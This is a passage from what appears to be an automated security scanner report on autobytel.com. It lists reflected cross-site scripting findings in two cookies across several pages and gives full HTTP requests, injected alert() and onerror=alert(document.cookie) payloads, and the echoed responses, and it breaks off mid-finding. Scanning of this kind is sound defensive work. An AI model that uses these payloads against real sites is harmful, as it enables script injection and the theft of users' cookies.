This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-dealers.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c46acbb"%3balert(1)//cf6dd0ed469; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:28 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38856


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c46acbb";alert(1)//cf6dd0ed469";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "487E3BC3-B6F2-73D5-894DEBA7
...[SNIP]...

4.2011. http://www.autobytel.com/car-dealers.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-dealers.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 713df"%3balert(1)//8f3b278436a was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 713df";alert(1)//8f3b278436a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-dealers.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=713df"%3balert(1)//8f3b278436a; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:03:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:03:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:03:53 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:03:53 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38856


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "713df";alert(1)//8f3b278436a||";
           
           s.prop14 = "research|selectstate : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||rec|sky|b
...[SNIP]...

4.2012. http://www.autobytel.com/car-financing.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-financing.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e824"%3balert(1)//4d2f4dba527 was submitted in the BDATALIST cookie. This input was echoed as 1e824";alert(1)//4d2f4dba527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-financing.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c41e824"%3balert(1)//4d2f4dba527; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:48:01 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41454


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c41e824";alert(1)//4d2f4dba527";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "484325D1-F1F9-E72B-62663761
...[SNIP]...

4.2013. http://www.autobytel.com/car-financing.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-financing.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56ed0"%3balert(1)//20669fda9de was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 56ed0";alert(1)//20669fda9de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-financing.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=56ed0"%3balert(1)//20669fda9de; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:52:05 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41454


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
.prop8 = "finins|Any";
           
           //s.prop9 = "finins|Search Engine Optimization Project|13148";
           s.prop10 = "finins|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "56ed0";alert(1)//20669fda9de||";
           
           s.prop14 = "car financing page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "finins||||sky|ban|Sear
...[SNIP]...

4.2014. http://www.autobytel.com/car-incentives.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-incentives.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25dbe"%3balert(1)//9b59bff91b9 was submitted in the BDATALIST cookie. This input was echoed as 25dbe";alert(1)//9b59bff91b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-incentives.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c425dbe"%3balert(1)//9b59bff91b9; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:53 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:53 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33931


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c425dbe";alert(1)//9b59bff91b9";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "482FAE8E-A4D0-EBBF-3AE875AD
...[SNIP]...

4.2015. http://www.autobytel.com/car-incentives.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-incentives.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f72b"%3balert(1)//b82e025c3dc was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 5f72b";alert(1)//b82e025c3dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-incentives.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=5f72b"%3balert(1)//b82e025c3dc; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:50:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:59 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:49:59 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33931


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
.prop7 = "rebates|";
           
           //s.prop9 = "rebates|Search Engine Optimization Project|13148";
           s.prop10 = "rebates|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "5f72b";alert(1)//b82e025c3dc||";
           
           s.prop14 = "car incentives page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "rebates||||sky|ban|Se
...[SNIP]...

4.2016. http://www.autobytel.com/car-news.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-news.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3a18"%3balert(1)//e56036844aa was submitted in the BDATALIST cookie. This input was echoed as b3a18";alert(1)//e56036844aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-news.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4b3a18"%3balert(1)//e56036844aa; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:51:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:51:11 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 40889


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4b3a18";alert(1)//e56036844aa";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48603924-C61E-B2E2-10A7CDC6
...[SNIP]...

4.2017. http://www.autobytel.com/car-news.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-news.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dcea"%3balert(1)//1c6f78cfa84 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 2dcea";alert(1)//1c6f78cfa84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-news.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=2dcea"%3balert(1)//1c6f78cfa84; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:03 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:03 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 40889


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "2dcea";alert(1)//1c6f78cfa84||";
           
           s.prop14 = "car news page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research||||sky|ban|Search
...[SNIP]...

4.2018. http://www.autobytel.com/car-pictures.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-pictures.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78c44"%3balert(1)//1e7af7a9edd was submitted in the BDATALIST cookie. This input was echoed as 78c44";alert(1)//1e7af7a9edd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-pictures.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c478c44"%3balert(1)//1e7af7a9edd; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43566
Expires: Mon, 24 Jan 2011 23:47:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:30 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:30 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:30 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c478c44";alert(1)//1e7af7a9edd";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "483E67CF-DBEB-149B-E3465F67
...[SNIP]...

4.2019. http://www.autobytel.com/car-pictures.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-pictures.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6c37"%3balert(1)//3474e0c2a81 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as b6c37";alert(1)//3474e0c2a81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

